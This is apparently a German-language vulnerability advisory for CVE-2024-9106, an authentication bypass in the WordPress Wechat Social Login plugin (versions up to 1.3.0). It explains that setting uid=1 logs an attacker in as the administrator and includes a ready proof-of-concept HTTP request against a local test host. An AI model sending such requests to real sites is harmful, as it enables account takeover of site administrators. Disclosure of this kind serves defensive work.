
Wechat Social login <= 1.3.0 - Authentifizierungsumgehung
Wechat Social login <= 1.3.0 - Authentifizierungsumgehung
Das Wechat Social Login Plugin für WordPress ist in Versionen bis einschließlich 1.3.0 anfällig für Authentifizierungsumgehung. Dies liegt an unzureichender Überprüfung des Benutzers, der während des Social Logins bereitgestellt wird. Dadurch können nicht authentifizierte Angreifer sich als jeder vorhandene Benutzer auf der Website anmelden, beispielsweise als Administrator, wenn sie Zugriff auf die Benutzer-ID haben. Dies ist nur ausnutzbar, wenn das App-Geheimnis nicht gesetzt ist, da es einen leeren Standardwert hat. Fügen Sie einfach uid=1 hinzu oder ändern Sie die ID-Nummer auf das Konto, mit dem Sie sich anmelden möchten. Funktioniert nur für Wechat.
CVE: CVE-2024-9106
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: wechat-social-login
GET /wp-admin/admin-ajax.php?channel_id=social_weibo&action=xh_social_channel&uid=1&tab=login_redirect_to_authorization_uri&xh_social_channel=8e7bec203c¬ice_str=1773207877&hash=4165e284f73b86c0c642973816d0cd17&redirect_to=http%3A%2F%2Fkubernetes.docker.internal%2Fwp-admin%2F HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive